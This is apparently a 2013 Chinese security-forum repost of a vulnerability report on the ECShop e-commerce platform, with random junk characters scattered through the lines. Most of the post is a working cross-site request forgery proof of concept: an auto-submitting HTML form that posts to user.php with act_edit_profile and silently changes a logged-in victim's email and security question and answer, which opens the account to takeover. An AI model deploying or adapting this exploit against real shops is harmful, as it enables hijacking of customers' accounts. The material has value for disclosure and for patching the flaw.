找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1819|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
简要描述:
' P5 Z9 E7 }; ], }* ^; \ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ ~! I% k  ?9 p3 X0 |; S  `/ \# Y, N6 i1 W1 o6 W
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
$ e# }/ O! I: U) u* ^. ^0 T2 Q1 B" L# A2 d7 u+ g# ^
详细说明:
  r8 ]+ \, T9 O6 {3 [- Z* x利用csrf和xss可以突破官方所说的“障碍”2 o  ^- z, G3 ?( b( X, _
xss版本已经有人说明
6 O" z0 K3 _: a( i! N3 O% |% r' I9 K" e这里给出csrf版本
* W$ u, J# l/ h  f+ `+ R2 x. o/ l. F- {, F0 ~
漏洞证明:9 k- k4 U: a0 m7 X' X
<html>
7 |: Y% Q( f) X# Y9 e- J<body>
' Z; U7 b$ h5 E+ y<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
; l# H/ `: g: E( s  f, j: ?4 n<INPUT TYPE="text" NAME="email" value="hack@wooyun.org"># W7 w' [! P( q+ \: w
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
( A3 X. u7 U, M<INPUT TYPE="text" NAME="sel_question" value="ecshop">" p* i3 l3 l$ j! s8 o3 d- x
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">- c) H" ~% M/ }0 Y" }% A
</body>
5 P# c. x$ k9 R, e2 @" x<script>3 e# D: l& r; r1 i& }2 S
document.forms[0].submit();0 L  N2 G4 s1 @' [( C
</script>
# O" ?5 [2 }* u- A</html>
7 L7 L- W' n7 K构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失. Z6 [/ O. p& @, P) u) v2 U

8 z! h! [3 q/ r, X" }# k0 w( r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表